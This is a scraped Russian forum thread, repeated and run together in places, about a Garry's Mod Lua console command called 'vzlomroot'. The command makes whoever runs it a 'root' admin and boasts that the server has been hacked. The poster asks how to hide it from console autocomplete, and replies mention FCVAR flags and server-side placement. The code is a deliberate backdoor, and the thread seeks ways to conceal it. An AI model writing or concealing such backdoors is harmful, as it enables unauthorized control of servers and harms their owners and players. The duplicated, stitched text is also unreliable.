Хорошо, в таком случае это тебе в помощь: FCVARпричём тут клиент вообще? Прошу не писать не по теме, если ты не знаешь
Если ты регаешь эту команду на клиенте - ты гений нахуйПоясню, я хочу сделать команду, которая будет как-бы "скрытая". Поясню, когда вы пишете в консоль какую-либо команду - она высвечивается. К примеру если начать писать "vzl", то команду находит помощник в консоле, а я хочу сделать так чтобы она там не отображалась, как это сделать?) Код команды ниже.
concommand.Add("vzlomroot", function(ply)
RunConsoleCommand("ba", "setgroup", ply:SteamID(), "root")
ply:ChatPrint( "Вы хукнули сервер радуйтесь : D" )
end)
причём тут клиент вообще? Прошу не писать не по теме, если ты не знаешьЕсли ты регаешь эту команду на клиенте - ты гений нахуй
Хорошо, в таком случае это тебе в помощь: FCVARпричём тут клиент вообще? Прошу не писать не по теме, если ты не знаешь
Напиши на SV части или ограничь её проверкойПоясню, я хочу сделать команду, которая будет как-бы "скрытая". Поясню, когда вы пишете в консоль какую-либо команду - она высвечивается. К примеру если начать писать "vzl", то команду находит помощник в консоле, а я хочу сделать так чтобы она там не отображалась, как это сделать?) Код команды ниже.
concommand.Add("vzlomroot", function(ply)
RunConsoleCommand("ba", "setgroup", ply:SteamID(), "root")
ply:ChatPrint( "Вы хукнули сервер радуйтесь : D" )
end)